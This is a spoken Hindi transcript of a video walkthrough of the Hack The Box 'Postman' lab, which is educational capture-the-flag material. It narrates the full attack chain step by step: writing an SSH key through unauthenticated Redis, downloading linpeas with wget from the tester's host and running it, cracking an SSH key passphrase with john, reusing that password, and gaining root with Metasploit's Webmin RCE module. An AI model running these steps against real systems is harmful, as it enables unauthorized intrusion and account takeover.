हेलो गाइस, वेलकम बैक टू आवर चैनल। आज हम लोग हैक द बॉक्स का पोस्टमैन लैब सॉल्व करने वाले हैं। ये लैब एक लिनक्स बेस्ड लैब डे एंड अगेन एक इजी लैब में से है। सो एज यूजुअल हम लोग nmap स्कैन के साथ शुरुआत करेंगे। मैंने ऑलरेडी nmap स्कैन लगा के रखा है, ठीक है। सो nmap स्कैन में मैंने एकदम सिंपल nmap स्कैन लगाया जिसमें -p फ्लैग यूज़ किया, -pn एंड -t4 फ्लैग यूज़ किया गया। इसमें हम लोग को 4 पोर्ट्स ओपन मिला है। पोर्ट नंबर 22 SSH, पोर्ट नंबर 80 HTTP, पोर्ट नंबर 6379 दैट इज़ रेडीज एंड पोर्ट नंबर 10,000 जिसके ऊपर एसनेट सेंसर MGMT करके जो सर्विस है वो ओपन है। सो सबसे पहले हम लोग क्या करेंगे, अभी जैसे हम लोग को पोर्ट नंबर 80 ओपन मिला है, सो हम लोग पोर्ट नंबर 80 को ब्राउज़र में ओपन कर लेते हैं। ठीक है, तो पोर्ट नंबर 80 को हम लोग ने ओपन कर दिया है ब्राउज़र में एंड यहाँ पे एकदम सिंपल वेबसाइट दिख रहा है। एज सच ज़्यादा कुछ चीज़ें है नहीं, बस यहाँ पे रिजर्व बाय पोस्टमैन @HTTP दिख रहा है। दैट मीन्स मे बी ये इसका ईमेल एड्रेस हो सकता है किसी यूज़र का, ठीक है। सो आज सच इसमें ज़्यादा कुछ पोटेंशियल चीज़ दिखा नहीं है। हम लोग इसके ऊपर डायरेक्टरी सर्च स्कैन लगा देते हैं। सो कैसे लगाएंगे, सबसे पहले मैं एक नया टैब ओपन करता हूँ जिसमें मैं डायरेक्टरी सर्च -u http:// एंड अपना जो IP एड्रेस है वो डाल देते, ठीक है। डिफ़ॉल्ट वर्ड लिस्ट के लिए मैंने स्कैन लगा दिया है। अंटिल दैट हम लोग क्या करते हैं, जब तक स्कैन चल रहा है पोर्ट नंबर 10,000 को भी ओपन करके देख लेते हैं एक बार इसके ऊपर क्या है, ठीक है। कोलन 10,000 को अगर हम लोग ओपन करें, सो यहाँ पे क्या आ रहा है, एरर डॉक्यूमेंट फॉलोज, दिस वेब सर्वर इज रनिंग इन SSL मोड, ट्राई द URL https://postman:10,000 ये यहाँ पे दिखाई दे रहा है, ठीक है। सो हम लोग इसको ओपन करते हैं नए टैब में। सो यहाँ पे बेसिकली हम लोग को रीडायरेक्ट करने के लिए बोल रहा था ये URL पे, तो हम लोग ने इसको नए टैब में ओपन कर दिया एंड यहाँ पे वेबमिन का एक बेसिकली लॉगिन पेज ओपन हो गया है, ठीक है। हम लोग डिफ़ॉल्ट क्रेडेंशियल्स ट्राई कर सकते हैं, जैसे कि एडमिन एडमिन हो गया, नहीं हो रहा है। एडमिन पासवर्ड ट्राई कर सकते हैं, जस्ट अ सेकेंड। एडमिन पासवर्ड से भी नहीं हो रहा, तो डिफ़ॉल्ट क्रेडेंशियल से तो लॉगिन है नहीं, ठीक है। एंड फिर अभी हम लोग और क्या कर सकते हैं, जब तक डायरेक्टरी सर्च चल रहा है एक बार डायरेक्टरी सर्च का रिजल्ट देख लेते हैं। इमेजेस है, JS है एंड ऐसा बहुत सारा चीज़ें दिख रहा है, ठीक है। इसके ऊपर एक और इंटरेस्टिंग पोर्ट ओपन मिला, दैट इज़ रेडिस का पोर्ट मिला हम लोग को। सो रेडिस का हम लोग कैसा एक्सेस ले सकते हैं, सो देखने के लिए सबसे पहले हम लोग फायरफॉक्स ओपन करते हैं एंड हम लोग सर्च करेंगे रेडिस हैक्ट्रिक्स, ठीक है। यहाँ पे नीचे वेबसाइट आके उसको ओपन कर लेते हैं। सो हैक्ट्रिक्स के ऊपर आपको ऑलमोस्ट सारे पोर्ट्स एंड सारे सर्विसेज रिलेटेड कुछ ना कुछ वल्नरेबिलिटी या फिर स्टेप्स मिलेंगे जिसके थ्रू आप उसको एक्सप्लॉइट कर सकते हो, ठीक है। सो यहाँ पे पेन टेस्टिंग रेडीज लिखा है। अगर हम लोग थोड़ा नीचे जाए, सो बेसिक इन्फॉर्मेशन रिलेटेड टू रेडीज, पोर्ट नंबर दिया गया है, सर्विस का नाम क्या रहता है वो दिखाई देगा एंड यहाँ पे nmap का भी स्क्रिप्ट दिया गया है रेडीज का इन्फो निकालने के लिए। सो अगर हम लोग को रेडीज कनेक्ट करना है तो कैसे कर सकते हैं हम लोग, एक तो नेटकैट के थ्रू कर सकते हैं, NC-VN, देन अपना IP एड्रेस एंड पोर्ट नंबर, ठीक है, ये इसके थ्रू कर सकते हैं। या फिर हम लोग रेडीज CLI करके एक टूल है, रेडीज का टूल है, उसके थ्रू हम लोग कनेक्ट कर सकते हैं। तो सबसे पहले पहला वाला कमांड फायर करते हैं अपन, कॉपी कर लेंगे, पेस्ट करेंगे। यहाँ पे IP एड्रेस अपना 160 था, सो 160 डाल के एंटर करते हैं। सी यहाँ पे ओपन आ गया है। अभी टू फाइंड आउट कि हम लोग इसके ऊपर कुछ एक्सेस कर सकते हैं कि नहीं, कैसे देखेंगे, नीचे आते हैं रेडीज ऑथेंटिकेशन और थोड़ा नीचे आते हैं यहाँ पे ऑथेंटिकेटेड इनमरेशन। अभी हम लोग को ओपन मिल गया, दैट मीन्स ओपन ऑथेंटिकेशन हो गया। इन्फो कर सकते हैं, इन्फो से हम लोग को रेडीज रिस्पॉन्स विद द इन्फो, इन्फो से हमको इन्फॉर्मेशन मिल सकता है। सो लेट्स सी, इन्फो अगर मैंने डाला, सो यप यहाँ पे बहुत सारा इन्फॉर्मेशन आ गया है, जैसे कि यूज CPU सिस्टम, रोल्स क्या है वो दिखाई दे रहा है, रोल मास्टर है एंड कॉन्फ़िगरेशन फाइल कहाँ पे रेडीज का वो पता चल रहा है, etc/redis/redis.config करके यहाँ पे फाइल है उसका, ठीक है। सो ये चीज़ें पता चल रही है, यहाँ पे वर्जन पता चल रहा है GCC वर्जन,
रेडीज वर्जन क्या है, 4.0.9 है वो पता चल रहा है। ठीक है, सो इन्फो से ये सब चीज़ें हम लोग को पता चल रही है। अ, अभी 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 हम लोग और क्या ट्राई कर सकते हैं। हम लोग लेट्स सी वेबसाइट को ओपन करते हैं। गेट कॉन्फ़िग, हम लोग कॉन्फ़िगरेशन चेक कर सकते हैं एक बार क्या कॉन्फ़िगरेशन है दिखता है। तो हम लोग इसको पेस्ट करेंगे यहाँ पे, गेट कॉन्फ़िग एस्ट्रिक। सो यहाँ पे कॉन्फ़िगरेशन डिटेल्स आ गया है। ठीक है, रेडीज डॉट एस एस एच है, मतलब इसके ऊपर अगेन रेडीज यूज़र के थ्रू हम लोग एस एस एच ले सकते हैं, स्लैश डॉट एस एस एच फाइल है तो। ठीक है, सो यहाँ तक तो ठीक है। अभी हम लोग क्या करते हैं, थोड़ा और फाइंड आउट करते हैं कि और क्या क्या कर सकते हैं हम लोग रेडीज़ के साथ। अगर रेडीज़ का पोर्ट ओपन मिलता है, डेटाबेस डंप कर सकते हैं की स्पेस के थ्रू। ठीक है, कीज़ एस्ट्रिक करके देख सकते हैं। और नीचे जाते हैं, लेट्स सी व्हाट इज़ पॉसिबल। आरसी ले सकते हैं, रेडीज़ आरसी शेल ले सकते हैं। तो कैसे शेल ले सकते हैं हम लोग, रेडी सी एल आई के थ्रू शेल ले सकते हैं। और क्या कर सकते हैं, एस एस एच कर सकते हैं। तो अभी हम लोग ने यहाँ पे देखा कि डॉट एस एस एच करके फाइल फोल्डर है, दैट मीन्स इसके रेडीज़ के ऊपर हम लोग एस एस एच ले सकते हैं। तो उसको कैसा लेना है, यहाँ पे सबसे पहले बोला है जनरेट पब्लिक एंड प्राइवेट की पेयर ऑन यूर पीसी। सो सबसे पहले हमारे पीसी के लिए हम लोग को पब्लिक या फिर पब्लिक एंड प्राइवेट की पेयर जनरेट करना है फॉर आर यूज़र, जिससे हम लोग लॉग्ड इन है। देन पब्लिक की फाइल को राइट करना है, उसके लिए हम लोग को क्या करना है, स्लैश एन, मतलब स्टार्टिंग में एंड एंडिंग में, फाइल के स्टार्टिंग में डॉट पी ओ बी फाइल जनरेट होगा जब हम लोग एस एस एच की जन के थ्रू फाइल को जनरेट करेंगे। ठीक है, तो उसके स्टार्टिंग एंड एंडिंग में 2 लाइन छोड़ना है, स्लैश एन इज़ 1 लाइन, तो आगे 2 लाइन छोड़ना है, लास्ट में 2 लाइन छोड़ना है। एंड फिर उसको सेव करना टी एक्स टी फाइल के अंदर। देन इंपोर्ट करना है हम लोग को ओके एस एस एच की के फॉर्मेट में। आफ्टर दैट हम लोग को रेडी सी एल आई में जाके कॉन्फिग सेट डायरेक्टरी, ये हम लोग को मिला है, इसके अंदर जाके सेट डेटाबेस फाइल नेम ऑथोराइज की एंड सेव कर देना है। ठीक है, एंड देन वी नीड टू कनेक्ट टू द रेडीज एस एस एच। ठीक है, तो हम लोग ये ट्राई करते हैं। सबसे पहले एक नया टैब ओपन कर लेंगे हम लोग। यहाँ पे स्कैन ख़त्म हो गया, एज सच कुछ मिला नहीं, एक अपलोड करके डायरेक्टरी मिला है। तो अगर मैं अपलोड में जाऊँ, लेट्स सी हम लोग को क्या मिलता है अपलोड में, स्लैश अपलोड। सो अपलोड में कुछ जेपीजीज मिल रहा है, एज सच कुछ क्रिटिकल डेटा नहीं है यहाँ पे। ठीक है, तो हम लोग इसको इग्नोर कर सकते हैं फॉर नाउ। एंड मैं इसको क्लियर कर देता हूँ, थोड़ा बड़ा करता हूँ। सो अभी एज पर द गाइडलाइंस जो यहाँ पे बताया गया है इन हैक्ट्रिक्स के, अगर आपको एस एस एच लेना है तो फर्स्ट यूनिट टू जनरेट यूर एस एस एच की यूजिंग एस एस एच की जन टूल। सो सबसे पहले हम लोग वो ट्राई करते हैं। ठीक है, सो हम लोग लिखेंगे एस एस एच हाइफन कीजन हाइफन ऐप पोस्टमैन एंड एंटर करेंगे। सो ये पास फ्रेज पूछ रहा है, हम लोग कुछ भी नहीं एंटर करेंगे, एम्प्टी छोड़ देंगे एंड एंटर के ऊपर क्लिक करेंगे। सेम पास फ्रेज एंटर क्लिक करेंगे एंड यहाँ पे जनरेट हो गया। ठीक है, फॉर द रूट यूज़र। अभी अगर हम लोग एल एस करें, सो हम लोग डेस्कटॉप के ऊपर एक काम करते हैं, मैं यहाँ से इसको हटा देता हूँ, आर एम हाइफन आर एफ पोस्टमैन आस्ट्रिक एंटर एल एस। ठीक है, सबसे पहले हम लोग अपने एच टी बी फोल्डर में जाते हैं, यहाँ पे पोस्टमैन करके ऑलरेडी बना हुआ है, उसके अंदर जाते हैं पोस्टमैन। ठीक है, यहाँ पे कुछ नहीं। अभी यहाँ पे वो सेम कमांड फायर करेंगे, क्या था, एस एस एच हाइफन कीजन हाइफन एफ पोस्टमैन एंटर एंटर एल एस करेंगे। सो यहाँ पे पोस्टमैन डॉट पब फाइल बन गया। अगर हम लोग कैट करें, सो वी कैन सी यहाँ पे वो जनरेट हो गया है अपना पब फाइल। ठीक है, नाउ नेक्स्ट स्टेप अकॉर्डिंग टू आर्टिकल क्या था कि हम लोग को पब फाइल के स्टार्टिंग में एंड एंडिंग में स्पेस ऐड करना है, 2 लाइन का, 2 लाइन ऐड करना है बेसिकली। तो हम लोग इसको वी आई एडिटर में ओपन करते हैं, पोस्टमैन हाइफन पी यू बी। ठीक है, इंसर्ट मोड में जाते हैं, एंटर एंटर एंड लास्ट में जाके भी
एंटर एंटर, ठीक है। एस्केप कोलन WQ करके हम लोग सेव करेंगे। अभी अगर हम लोग कैट करें पोस्टमैन डॉट पब को, सी यहाँ पे स्टार्टिंग में 2 स्पेसेस एंड एंडिंग में 2 स्पेसेस ऐड हो गया, ठीक है। नाउ नेक्स्ट स्टेप क्या करना है, इंपोर्ट द फाइल इनटू अ रेडिस। ये फाइल रेडिस में इंपोर्ट करना है, तो इसको इंपोर्ट करने के लिए क्या करना है, इसको कॉपी कर लेंगे। कॉपी करने से अच्छा हम लोग टाइप करते हैं, तो क्या करना है, कैट पोस्टमैन फाइल, इसके बाद पाइप लगा के अभी यहाँ पे रेडिस CLI -H इसको कॉपी कर लेते हैं, ठीक है। Ctrl+C Ctrl+Shift+V एंड यहाँ पे IP एड्रेस की जगह पे हम लोग अपना IP एड्रेस डाल देंगे, विच इज़ टारगेट का IP एड्रेस बेसिकली 10.10.10.160 -X हम लोग सेट SSH की करें, ठीक है। तो हम लोग ये रेडिस पे अपना वाला जो पोस्टमैन डॉट पब फाइल है उसको पुश कर रहे हैं, एंटर करेंगे। सो ओके आ गया, दैट मीन्स हमारा सेट हो गया। अभी नेक्स्ट स्टेप क्या बोला कि ये जो फाइल हम लोग ने निकाला है इसको हम लोग को सेव द पब्लिक की टू द ऑथराइज की फाइल्स ऑन द रेडिस सर्वर, ठीक है। तो हम लोग को इसको सेव करना। सो कैसे करेंगे, सिंपली हमको रेडिस CLI के थ्रू सबसे पहले एक्सेस लेना है, ठीक है। तो हम लोग एक्सेस लेते हैं, रेडिस -CLI -H होस्ट दैट इज़ 10.10.10.160 एंटर करेंगे। रेडिस का एक्सेस हम लोग को मिल गया। अभी नेक्स्ट स्टेप क्या, कन्फिग सेट डायरेक्टरी करना। तो ये डायरेक्टरी हम लोग को जो मिला था वहाँ पे SSH का सेम डायरेक्टरी यहाँ पे भी है, तो हम लोग पेस्ट करते हैं, एंटर करेंगे। ओके आ गया, डायरेक्टरी सेट कर लिया अभी हम लोग ने। नेक्स्ट स्टेप क्या है, कॉन्फिग सेट DB फाइल करना। सो इसको भी कॉपी कर लेंगे एंड पेस्ट, एंटर। ओके आ गया, नाउ सेव करना है। सो सिंपली सेव के ऊपर क्लिक करेंगे, एंटर हो गया। अभी इसके बाद क्या बोला, टू गेट द SSH हम लोग को SSH -i ID-RSA फाइल, दैट मीन्स हमारा वो जो दूसरा पोस्टमैन फाइल है उसके थ्रू हम लोग को एक्सेस लेना है, ठीक है। तो अगर मैं नया टैब ओपन करूँ, ls करें, तो यहाँ पे 2 फाइल था, एक था पोस्टमैन डॉट पब और एक पोस्टमैन। कैट पोस्टमैन करूँ, सो यहाँ पे देखो प्राइवेट की अपना, तो इसके थ्रू हम लोग को कनेक्शन लेना है। कैसे लेंगे, SSH -i पोस्टमैन, और किसका लेना है, रेडिस यूज़र का, रेडिस @10.10.10.160 एंटर करेंगे। यहाँ पे हम लोग को रेडिस का SSH का एक्सेस मिल गया है, ठीक है। ls करेंगे, सी वी आर इनसाइड द रेडिस यूज़र, वो mi करेंगे, वी कैन सी वी आर रेडिस यूज़र, ठीक है। सो हम लोग को रेडिस यूज़र का एक्सेस मिल गया। तो अगर हम लोग cd/home में जाएं, ls, यहाँ पे एक मैट नाम का यूज़र हम लोग को दिखाई दे रहा है, cd मैट के अंदर आ गए, ls करेंगे, users.txt दिख रहा है, कैट यूज़र्स, या फिर अगर हम लोग ls-la user.txt करें, सो मैट को रीड राइट का परमिशन है एंड मैट के ग्रुप को रीड राइट का है। तो अगर मैं अभी यहाँ पे कैट user.txt करूँ, सो आई कैन नॉट सी दैट फाइल, परमिशन डिनाइड आ रहा है मेरे को, ठीक है। सो टू एक्सेस द user.txt फाइल मेरे को मैट यूज़र से लॉग इन करना पड़ेगा, ठीक है। वी गॉट द एक्सेस टू द रेडिस यूज़र, बट उसके थ्रू हम लोग को आज सच कोई चीज़ मिल नहीं रहा। नाउ हम लोग क्या कर सकते हैं, हम लोग इसके ऊपर हमारा जो linpis का फाइल है उसको रन कर सकते हैं। तो फॉर दैट मैं इसको एग्जिट करता हूँ, फिर Ctrl+C क्लियर करते हैं, cd/opt पीस linpis के अंदर जाते हैं, ls, इसके अंदर हमारा linpis डॉट फाइल है, ठीक है, linpis.sh फाइल है। तो python -m सर्वर चालू कर दिया। हमारा IP एड्रेस क्या है यहाँ पे, 10.10.14.54 है। सो हम लोग linpis का फाइल कैसे लेंगे, wget, सबसे पहले हम लोग यहाँ से temp फाइल में जाते हैं, cd temp, ठीक है, temp में आ गए। अभी यहाँ पे हम लोग वो फाइल को लेते हैं। सो फॉर दैट हम लोग wget यूज़ करेंगे, wget http:// हमारा IP एड्रेस दैट इज़ 10.10.14.54 स्लैश linpis के फाइल का नाम दैट इज़ linpis.sh एंटर करेंगे। सो यहाँ पे वो फाइल आ रहा है,
ठीक है, अगर मैं ls करूँ सो यहाँ पे linpiece.sh फाइल आ गया। ठीक है, क्लियर करते हैं। अभी सबसे पहले परमिशन दे देते हैं chmod +x linpiece.sh, स्पेल मिस्टेक। ठीक है, एग्जीक्यूशन का परमिशन दे दिया। अभी टू एग्जीक्यूट हम लोग ./linpiece.sh करेंगे। ठीक है, एंटर करेंगे एंड linpiece को रन होने देते हैं। linpiece का स्कैन ख़त्म हो गया तो हम लोग स्कैन के थ्रू जाते हैं, देखते हैं हम लोग को आज सच पोटेंशियल क्या मिलता है यहाँ पे। यहाँ पे बैकअप फाइल्स के अंदर हम लोग को opt id rsa.backup फाइल दिख रहा है। ठीक है, जिसको हम लोग को परमिशन है, बेसिकली देख सकते हैं हम लोग इसको। तो बैकअप फाइल के अलावा एज सच हम लोग को कुछ मिला तो नहीं है। ठीक है, तो SSH फाइल में id_rs यहाँ पे वापस वो फाइल दिखा रहा है बैकअप फाइल, तो आई थिंक सो वो उसके अंदर SSH का की है। सो व्हाट वी कैन डू, हम लोग इसको कॉपी कर लेते हैं एंड कॉपी करने के बाद cd/opt ls करते हैं एंड यहाँ पे वो फाइल है। ठीक है, सो अगर मैं cat id rs से बैकअप फाइल करूँ सो वी कैन सी यहाँ पे वो बैकअप फाइल दिखाई दे रहा। नाउ अभी हम लोग इसको क्या कर सकते हैं, बेसिकली वी कैन ट्राई टू गेट पासवर्ड ऑफ मैट यूज़र बाय यूजिंग अ जॉन। सो हम लोग कैसे करेंगे, हम लोग को सबसे पहले ये जो की मिला है हम लोग को बैकअप के अंदर, वो की को हम लोग को कॉपी करना पड़ेगा एंड कॉपी करने के बाद सिंपली हम लोग उसको .ssh फाइल में स्टोर करेंगे एंड ssh टू जॉन के थ्रू हम लोग उसको कन्वर्ट करेंगे। ठीक है, सो स्टेप बाय स्टेप करते हैं। सो हम लोग सबसे पहले क्या करते हैं, ये पूरे के पूरे फाइल को कॉपी करेंगे। ठीक है, इसको एग्जिट करते हैं, क्लियर। ओके, सो मैं क्या करूँगा, vi postman.ssh फाइल बनाऊँगा एंड इंसर्ट करके यहाँ पे वो फाइल को पेस्ट कर दूँगा। ठीक है, अब मैंने सेव कर लिया। अगर मैं ls करूँ तो यहाँ पे .ssh फाइल आ गया। अभी मैं ssh टू जॉन का यूज़ करूँगा और मैं क्या करूँगा, इसके थ्रू मैं जो अपना फाइल बनाया हम लोग ने उसको पास करेंगे ताकि हम लोग उसको जॉन के फॉर्मेट में कन्वर्ट कर सके टू क्रैक इट। ठीक है, अभी ये SSH फॉर्मेट में, तो अभी हम लोग इसको जॉन के फॉर्मेट में कन्वर्ट करेंगे एंड मैं इसको नाम देता हूँ postman.john.ssh। ठीक है, एंटर करते हैं। अब ये जॉन के फॉर्मेट में कन्वर्ट हो गया, यहाँ पे हम लोग के पास वो फाइल आ गया। ठीक है, कॉपी करके रखते हैं नाम इसका। नेक्स्ट थिंग, अभी हम लोग को इसको क्रैक करना है। सो कैसे कर सकते हैं, सिंपल कमांड है जॉन। जॉन के बाद हम लोग को देना है, हमारे फाइल का नाम देना है। सो फाइल का नाम क्या है, दैट इज़ postman postman.john.ssh फाइल का नाम है एंड देन हाइफन हाइफन वर्ड लिस्ट एंड वर्ड लिस्ट में हम लोग रॉक्यू का नाम देंगे। तो मेरा रॉक्यू मैंने लिखा है user/share वर्ड लिस्ट एंड rockyou.txt में। बहुत सिंपल कमांड है। इसके बाद हम लोग एंटर करेंगे। सो यहाँ पे मेरे को क्या बता रहा है, नो पासवर्ड हैश लेफ्ट टू क्रैक। सो आई थिंक सो ऑलरेडी क्रैक्ड है। सो इसको फाइंड कैसे करेंगे हम लोग कि ये क्रैक्ड फाइल कहाँ पे मिलेगा हम लोग को। टू सी दैट हम लोग बेसिकली जॉन हाइफन शो करेंगे एंड यहाँ पे हमारे फाइल का नाम डाल देंगे। ठीक है, सो ये मैंने ऑलरेडी सॉल्व किया था, तो ये ऑलरेडी मेरे जॉन के डेटाबेस में स्टोर्ड है क्रैक करने के बाद। सो इसका पासवर्ड क्या मिला था, कंप्यूटर 2008 करके इसका पासवर्ड मिला था। ठीक है, तो इसको कॉपी करते हैं एंड SSH में जाते हैं, क्लियर करते हैं su-mat
एंटर करेंगे, पासवर्ड पूछ रहा है, अभी हम लोग यहाँ पे वो पासवर्ड पेस्ट कर देते हैं, दैट इज़ कंप्यूटर 2008। एंटर करेंगे, सी हम लोग को मैट का एसएसएच मिल गया। अभी अगर मैं हूँ मैं करूँ, सो वी कैन सी वी आर लॉग्ड इन एज अ मैट यूज़र। तो हम लोग को मैट का मिल गया। अभी अगर मैं cd/home जाऊँ /मैट ls, सो अभी मैं user.txt फाइल को देख सकता हूँ, ठीक है। सो आप लोग देख के हैक द बॉक्स केस में वो फील कर देना। नेक्स्ट थिंग, अभी हम लोग को यूज़र का एक्सेस मिल गया। सो अभी हम लोग को पिवोट करना है टू द बेसिकली अभी हम लोग को प्रिविलेज एस्केलेशन करना है रूट यूज़र का। सो वी कैन ट्राई दिस क्रेडेंशियल जो हम लोग को मैट का क्रेडेंशियल्स मिला ऑन द वेब एडमिन पेज, ठीक है। तो कैसे करेंगे, सिंपली मैट एंड पासवर्ड वॉज कंप्यूटर 2008। ये देखें, हम लोग साइन इन करेंगे, ठीक है। सो वो क्रेडेंशियल्स काम कर गया है एंड हम लोग पोस्टमैन में तो साइन इन हो चुके हैं, नॉट इन द पोस्टमैन, सॉरी, वेब एडमिन में। तो अगर मैं डैशबोर्ड पे जाऊँ, इट्स लोडिंग, ओके। सो पेज लोड हो गया है यहाँ पे एंड यहाँ पे हम लोग को बेसिकली बहुत सारा चीज़ें दिख रहा है, जैसे कि ऑपरेटिंग सिस्टम कौन सा यूज़ हो रहा है एंड इसके अलावा हम लोग को वेबमीन का वर्जन मिल गया, दैट इज़ 1.910। सो हम लोग इसके बारे में डायरेक्टली एक्सप्लॉइट सर्च कर सकते हैं कि कोई अवेलेबल एक्सप्लॉइट है क्या। सो फॉर दैट हम लोग क्या करेंगे, इसको क्लियर करते हैं एंड सर्च एक्सप्लॉइट वेबमीन। सो वेबमीन का हमारा वर्जन है 9.1.0। सो हम लोग को यहाँ पे फॉर दिस पर्टिकुलर वर्जन एक रिमोट कोड एग्जीक्यूशन दिख रहा है विच इज़ पॉसिबल वाया मेटास्प्लॉइट। सो फॉर दैट हम लोग को मेटास्प्लॉइट यूज़ करना है। सो लेट्स यूज़ दैट, msf कंसोल, एंटर करेंगे, मेटास्प्लॉइट को शुरू करते हैं। सो मेटास्प्लॉइट लोड हो गया है। सो हम लोग क्या करेंगे, सर्च वेबमीन। सो यहाँ पे बहुत सारा अलग अलग दिख रहा है, हम लोग को यूज़ करना है पैकेज अपडेट RC, ये वाला एक्सप्लॉइट यूज़ करना है, ठीक है। सो हम लोग इसको कॉपी कर लेते हैं एंड वी विल से यूज़, पेस्ट करेंगे एंड अभी अगर हम लोग करें ऑप्शंस, ऑप्शंस में हम लोग को क्या क्या बताने को बोल रहा है, आर होस्ट बताने को बोल रहा है एंड एल होस्ट बताना है। सो हम लोग सबसे पहले आर होस्ट डालते हैं, आर होस्ट, सेट आर होस्ट, सेट आर होस्ट 10.10.10.160, ठीक है। सेट एल होस्ट टू ट्यून 0, टनल 0 इंटरफेस को हम लोग ने सेट कर दिया। इसके अलावा कुछ और सेट करना है हम लोग को, यूज़र नेम है हमारे पास, हम लोग यूज़र नेम सेट कर सकते हैं, पासवर्ड भी सेट कर सकते हैं हम लोग। सो सेट यूज़र नेम, क्या यूज़र नेम है हमारे पास, मैट है। सेट पासवर्ड, पासवर्ड कौन सा हमारे पास, कंप्यूटर 2008। एंटर करेंगे, हमने एल सेट कर दिया, हम लोग ने आर सेट कर दिया, हम लोग ने यूज़र नेम पासवर्ड सेट कर दिया है, यूज़र नेम सेट कर दिया। अभी हम लोग रन कर सकते हैं, रन करेंगे, लॉगिन हो गया, पेलोड सेंड कर रहा है। एक बार पेलोड सेंड हो जाए एंड कनेक्शन मिल जाएगा, सो वी कैन सी द शेल। इट्स वेट जब तक एक्सप्लॉइट पूरी तरीके से कंप्लीट हो रहा है। अगर मैं एलएस करूँ, यप एलएस किया है तो चल गया। सी वी कैन सी मल्टीपल थिंग्स, हम लोग को एग्जैक्ट प्रॉपर शेल तो नहीं मिला, बट वी कैन सी मल्टीपल थिंग्स। सो अगर मैं हु एम आई करूँ, सो वी कैन सी वी आर लॉग्ड इन एज अ रूट यूज़र नाउ। सो हम लोग को रूट एक्सेस मिल गया वाया दिस मेटास्प्लॉइट का जो एक्सप्लॉइट था, दैट इज़ वेबमीन पैकेज अपडेट RC, इसके थ्रू हम लोग को मिल गया। स्टेप्स वाज रियली सिंपल, हम लोग को बस वेबमीन का कौन सा वर्जन है वो आइडेंटिफाई करना था। वो आइडेंटिफाई करने के बाद हम लोग ने सर्च प्लॉट के थ्रू डायरेक्टली हम लोग को मिल गया था, ठीक है। सो नॉट टू गेट द रूट फ्लैग हम लोग को जाना पड़ेगा cd टिल्ट ls। अगेन यहाँ पे बहुत सारा चीज़ है,
सो हाउ कैन वी, बेसिकली हम लोग यहाँ पे देख नहीं पा रहे, ठीक है। अगर एक ऑब्जर्व करोगे आप, सो हम लोग को ऐसा शेल मिला है जिसमें सिर्फ हम लोग करंट डायरेक्टरी को देख सकते हैं। तो इवन मैं अगर सी डी टिल्ट कर रहा हूँ एंड प्रेजेंट वर्किंग डायरेक्टरी में जा रहा हूँ, सो इट्स इन द सेम पैकेज, दैट इज़ पैकेज अपडेट्स के अंदर है। तो टू सी इनसाइड अ टिल्ट मेरे को क्या करना पड़ेगा, एल एस टिल्ट करूँगा। सो यहाँ पे देखिए हम लोग के पास एल एस टिल्ट करने के बाद, टिल्ट फोल्डर इज बेसिकली रूट का फोल्डर रहता है, उसके अंदर क्या क्या मिला है, रेडीज 5.0.0.0 एंड रूट डॉट टी एक्स टी फाइल मिल गया। अब टू सी दैट हमको सिंपली क्या करना है, कैट रूट डॉट टी एक्स टी, ठीक है। सो हमको रूट फ्लैग मिल जाएगा। सो ये लैब बहुत सिंपल था, इजी था, ज़्यादा कुछ इसमें था नहीं, एकदम क्लियर कट लैब था, ठीक है। हम लोग ने सबसे पहले अनमैप्स का रन किया, हम लोग को 4 पोर्ट ओपन मिला, पोर्ट नंबर 22, पोर्ट नंबर 80, पोर्ट नंबर 6379 दैट इज़ रेडीज का पोर्ट नंबर एंड पोर्ट नंबर 10,000। सो पोर्ट नंबर 10,000 के ऊपर जाने के बाद हम लोग को बोला कि पोस्टमैन कोलन 10,000 के ऊपर रिडायरेक्ट करो, एंड वहाँ पे हम लोग जाने के बाद वहाँ पे वेबमिन का पेज मिला, ठीक है। वी ट्राइड फॉर द डिफ़ॉल्ट क्रेडेंशियल्स बट हम लोग को एक्सेस नहीं मिला। उसके बाद हम लोग ने सबसे पहले रेडीज़ का एक्सेस लिया, रेडीज़ को कोई क्रेडेंशियल्स था नहीं, सो हम लोग डायरेक्टली रेडीज़ का एक्सेस लिया। उसके थ्रू हम लोग ने हैक्टिक्स के ऊपर जाके देखा कि रेडीज़ के थ्रू हम लोग क्या क्या चीज़ें कर सकते हैं। सो देयर वी सॉ कि हम लोग रेडीज़ के थ्रू एसएसएच ले सकते हैं। फिर हम लोग ने हमारा एसएसएच का की जनरेट किया, हम लोग ने वो रेडीज़ के थ्रू सर्वर में डाला एंड वी गॉट एक्सेस टू द रेडीज़ यूज़र। इसके बाद हम लोग को मैट यूज़र का एक्सेस चाहिए था टू सी द यूज़र डॉट टी एक्स टी फाइल, तो हम लोग ने लिनपीज रन किया, हम लोग को एक बैकअप फाइल मिला। वो बैकअप फाइल के अंदर बेसिकली मैट यूज़र का एस एस एच की पड़ा हुआ था। सो हमने क्या किया, जॉन टू एस एस एच का यूज़ किया, एस एस एच टू जॉन का यूज़ किया, एंड देन जॉन की मदद से हम लोग ने वो एस एस एच की का जो पासवर्ड है उसको क्रैक किया। वी गॉट द पासवर्ड फॉर द मैट यूज़र, उसके थ्रू हम लोग ने उसका एस एस एच लिया एंड वी गॉट यूज़र डॉट टी एक्स टी फाइल। साथ में विद द सेम क्रेडेंशियल हम लोग लॉगिन कर पाए वेबमिन के पेज के ऊपर। वेबमिन के पेज के ऊपर लॉगिन करने के बाद वी सॉ द वर्जन ऑफ वेबमिन दैट इज़ 1.910 विच इज़ वल्नरेबल टू आर सी। सो और वो उसका एक्सप्लॉइट मेटास्प्लॉइट में था। सो विद द हेल्प ऑफ मेटास्प्लॉइट वी गॉट द आर सी एंड हम लोग को रूट का एक्सेस मिल गया। सो ये लैब के लिए बस इतना ही था। आई होप आपको ये वीडियो अच्छा लगा। प्लीज़ डू लेट मी नो इन द कमेंट्स कि आपको ये वीडियो कैसा लगा, एंड डोंट फॉरगेट टू लाइक, शेयर एंड सब्सक्राइब। थैंक यू गाइज।